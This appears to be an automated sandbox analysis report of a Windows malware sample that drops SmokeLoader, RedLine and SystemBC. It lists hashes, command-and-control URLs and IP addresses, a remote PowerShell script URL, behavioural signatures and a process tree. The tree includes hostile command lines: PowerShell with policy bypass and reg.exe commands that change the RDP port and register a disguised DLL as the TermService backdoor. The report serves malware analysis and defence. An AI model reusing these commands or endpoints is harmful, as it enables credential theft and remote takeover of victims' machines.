Analysis
max time kernel: 150s
max time network: 148s
platform: windows10_x64
resource: win10-en-20211208
submitted: 09-12-2021 11:41
Static task: static1
Behavioral task: behavioral1
  Sample: a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
  Resource: win10-en-20211208
General
Target: a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
Size: 299KB
MD5: a7b8bb9f2aaf5c1a07af5fdfabb2a1f4
SHA1: e5d892d8c416d2768f12e7f45c8588a0c98f5987
SHA256: 74e0750c52b67b6b099f46086e04d2a130d95dd42a8739289abc0395862e3e2b
SHA512: 041a14d3f3cc4d4264b5a151330c7022606d715888c3b30bc169010475e9171e1fa37c96181255e8d32fd6065a90a64f5a8df693fe3a5a0c9f92bd83998511f9
Malware Config
Extracted:
  https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted: smokeloader
  version: 2020
  C2:
  - http://rcacademy.at/upload/
  - http://e-lanpengeonline.com/upload/
  - http://vjcmvz.cn/upload/
  - http://galala.ru/upload/
  - http://witra.ru/upload/
Extracted: redline
  C2: 195.133.47.114:38627
Extracted: redline
  botnet: 1488
  C2: 80.66.87.52:80
Extracted: systembc
  C2: 185.209.30.180:4001
Signatures
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (7 IoCs)
Processes (resource, yara_rule):
- behavioral2/memory/3744-123-0x0000000000190000-0x00000000001F8000-memory.dmp: family_redline
- C:\Users\Admin\AppData\Local\Temp\AC0C.exe: family_redline
- C:\Users\Admin\AppData\Local\Temp\AC0C.exe: family_redline
- behavioral2/memory/2936-167-0x0000000000260000-0x00000000002CC000-memory.dmp: family_redline
- behavioral2/memory/2552-194-0x0000000000400000-0x0000000000420000-memory.dmp: family_redline
- behavioral2/memory/2552-196-0x0000000000418FB6-mapping.dmp: family_redline
- behavioral2/memory/2552-210-0x00000000056D0000-0x0000000005CD6000-memory.dmp: family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.
Blocklisted process makes network request (9 IoCs)
Processes (flow, pid, process):
- flow 88, pid 2544, powershell.exe
- flow 90, pid 2544, powershell.exe
- flow 91, pid 2544, powershell.exe
- flow 92, pid 2544, powershell.exe
- flow 94, pid 2544, powershell.exe
- flow 96, pid 2544, powershell.exe
- flow 98, pid 2544, powershell.exe
- flow 100, pid 2544, powershell.exe
- flow 102, pid 2544, powershell.exe
Downloads MZ/PE file
Executes dropped EXE (8 IoCs)
Processes (pid, process):
- 3744 93FF.exe
- 1480 AC0C.exe
- 2936 D753.exe
- 2140 Knots.exe
- 2552 Knots.exe
- 1836 818.exe
- 1164 818.exe
- 3524 66B4.exe
Modifies RDP port number used by Windows (1 TTPs)
Sets DLL path for service in the registry (2 TTPs)
Processes (resource, yara_rule):
- \Windows\Branding\mediasrv.png: upx
- \Windows\Branding\mediasvc.png: upx
Deletes itself (1 IoCs)
Processes (pid, process):
- pid 1880
Loads dropped DLL (2 IoCs)
Processes (pid, process):
- pid 428
- pid 428
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes (pid, process):
- 3744 93FF.exe
- 2936 D753.exe
Suspicious use of SetThreadContext (1 IoCs)
Processes (description, pid, process, target process):
- PID 2140 set thread context of 2552: pid 2140, Knots.exe -> Knots.exe
Drops file in Program Files directory (4 IoCs)
Processes (description, ioc, process):
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
Drops file in Windows directory (21 IoCs)
Processes (description, ioc, process):
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification: C:\Windows\Tasks\wow64.job (818.exe)
- File created: C:\Windows\branding\mediasvc.png (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
- File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
- File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
- File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
- File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB3D.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBADB.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB1B.tmp (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB2C.tmp (powershell.exe)
- File created: C:\Windows\Tasks\wow64.job (818.exe)
- File created: C:\Windows\branding\mediasrv.png (powershell.exe)
- File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zisfoqq2.ykd.ps1 (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rvrbkaip.ji2.psm1 (powershell.exe)
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBB0B.tmp (powershell.exe)
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe)
- Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe)
Modifies data under HKEY_USERS (64 IoCs)
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," (powershell.exe)
- Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" (powershell.exe)
- Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" (powershell.exe)
- Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones (powershell.exe)
Modifies registry key (1 TTPs, 1 IoCs)
Runs net.exe
Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
- HTTP User-Agent header, flow 91: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 92: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 94: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header, flow 90: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid, process):
- 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
- 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
- pid 1880 (62 entries, no process name recorded)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes (pid, process):
- pid 1880
Suspicious behavior: LoadsDriver (2 IoCs)
Processes (pid, process):
- pid 616
- pid 616
Suspicious behavior: MapViewOfSection (1 IoCs)
Processes (pid, process):
- 2420 a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (description, pid, process):
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 3744, 93FF.exe
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 1480, AC0C.exe
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 2140, Knots.exe
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 2936, D753.exe
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 2552, Knots.exe
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeShutdownPrivilege, pid 1880
- Token: SeCreatePagefilePrivilege, pid 1880
- Token: SeDebugPrivilege, pid 1016, powershell.exe
- Token: SeDebugPrivilege, pid 3704, powershell.exe
- Token: SeIncreaseQuotaPrivilege, pid 3704, powershell.exe
- Token: SeSecurityPrivilege, pid 3704, powershell.exe
- Token: SeTakeOwnershipPrivilege, pid 3704, powershell.exe
- Token: SeLoadDriverPrivilege, pid 3704, powershell.exe
- Token: SeSystemProfilePrivilege, pid 3704, powershell.exe
- Token: SeSystemtimePrivilege, pid 3704, powershell.exe
- Token: SeProfSingleProcessPrivilege, pid 3704, powershell.exe
- Token: SeIncBasePriorityPrivilege, pid 3704, powershell.exe
- Token: SeCreatePagefilePrivilege, pid 3704, powershell.exe
- Token: SeBackupPrivilege, pid 3704, powershell.exe
- Token: SeRestorePrivilege, pid 3704, powershell.exe
- Token: SeShutdownPrivilege, pid 3704, powershell.exe
- Token: SeDebugPrivilege, pid 3704, powershell.exe
- Token: SeSystemEnvironmentPrivilege, pid 3704, powershell.exe
- Token: SeRemoteShutdownPrivilege, pid 3704, powershell.exe
- Token: SeUndockPrivilege, pid 3704, powershell.exe
- Token: SeManageVolumePrivilege, pid 3704, powershell.exe
- Token: 33, pid 3704, powershell.exe
- Token: 34, pid 3704, powershell.exe
- Token: 35, pid 3704, powershell.exe
- Token: 36, pid 3704, powershell.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes (pid, process):
- pid 1880
- pid 1880
Suspicious use of SendNotifyMessage (2 IoCs)
Processes (pid, process):
- pid 1880
- pid 1880
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid, process, target process; identical consecutive entries are counted):
- PID 1880 wrote to memory of 3744: pid 1880 -> 93FF.exe (3 entries)
- PID 1880 wrote to memory of 1480: pid 1880 -> AC0C.exe (3 entries)
- PID 1880 wrote to memory of 2936: pid 1880 -> D753.exe (3 entries)
- PID 1480 wrote to memory of 2140: pid 1480, AC0C.exe -> Knots.exe (3 entries)
- PID 2140 wrote to memory of 2552: pid 2140, Knots.exe -> Knots.exe (8 entries)
- PID 1880 wrote to memory of 1836: pid 1880 -> 818.exe (3 entries)
- PID 1880 wrote to memory of 3524: pid 1880 -> 66B4.exe (2 entries)
- PID 3524 wrote to memory of 1016: pid 3524, 66B4.exe -> powershell.exe (2 entries)
- PID 1016 wrote to memory of 592: pid 1016, powershell.exe -> csc.exe (2 entries)
- PID 592 wrote to memory of 1196: pid 592, csc.exe -> cvtres.exe (2 entries)
- PID 1016 wrote to memory of 4052: pid 1016, powershell.exe -> csc.exe (2 entries)
- PID 4052 wrote to memory of 2828: pid 4052, csc.exe -> cvtres.exe (2 entries)
- PID 1016 wrote to memory of 3704: pid 1016, powershell.exe -> powershell.exe (2 entries)
- PID 1016 wrote to memory of 2784: pid 1016, powershell.exe -> powershell.exe (2 entries)
- PID 1016 wrote to memory of 1196: pid 1016, powershell.exe -> powershell.exe (2 entries)
- PID 1016 wrote to memory of 1292: pid 1016, powershell.exe -> reg.exe (2 entries)
- PID 1016 wrote to memory of 1136: pid 1016, powershell.exe -> reg.exe (2 entries)
- PID 1016 wrote to memory of 928: pid 1016, powershell.exe -> reg.exe (2 entries)
- PID 1016 wrote to memory of 4028: pid 1016, powershell.exe -> net.exe (2 entries)
- PID 4028 wrote to memory of 3372: pid 4028, net.exe -> net1.exe (2 entries)
- PID 1016 wrote to memory of 392: pid 1016, powershell.exe -> cmd.exe (2 entries)
- PID 392 wrote to memory of 3448: pid 392, cmd.exe -> cmd.exe (2 entries)
- PID 3448 wrote to memory of 2960: pid 3448, cmd.exe -> net.exe (2 entries)
- PID 2960 wrote to memory of 3868: pid 2960, net.exe -> net1.exe (2 entries)
- PID 1016 wrote to memory of 68: pid 1016, powershell.exe -> cmd.exe (2 entries)
- PID 68 wrote to memory of 3432: pid 68, cmd.exe -> cmd.exe (2 entries)
- PID 3432 wrote to memory of 2108: pid 3432, cmd.exe -> net.exe (1 entry)
Processes (process tree depth in brackets, followed by the captured command line and the signatures hit)

[1] C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\a7b8bb9f2aaf5c1a07af5fdfabb2a1f4.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\93FF.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\93FF.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\AC0C.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\AC0C.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[2] C:\Users\Admin\AppData\Local\Temp\Knots.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Knots.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[3] C:\Users\Admin\AppData\Local\Temp\Knots.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\Knots.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\D753.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\D753.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\818.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\818.exe
    - Executes dropped EXE
    - Drops file in Windows directory

[1] C:\Users\Admin\AppData\Local\Temp\818.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\818.exe start
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\66B4.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\66B4.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

[3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yslfveqh\yslfveqh.cmdline"
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C4B.tmp" "c:\Users\Admin\AppData\Local\Temp\yslfveqh\CSCD8AF42A3F41B44E48AB9BE8C7AC1C03D.TMP"

[3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4myurk4\d4myurk4.cmdline"
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES815C.tmp" "c:\Users\Admin\AppData\Local\Temp\d4myurk4\CSC164F69DC1D604A2CA266B1C51A7947C4.TMP"

[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

[3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

[3] C:\Windows\system32\reg.exe
    cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

[3] C:\Windows\system32\reg.exe
    cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    - Modifies registry key

[3] C:\Windows\system32\reg.exe
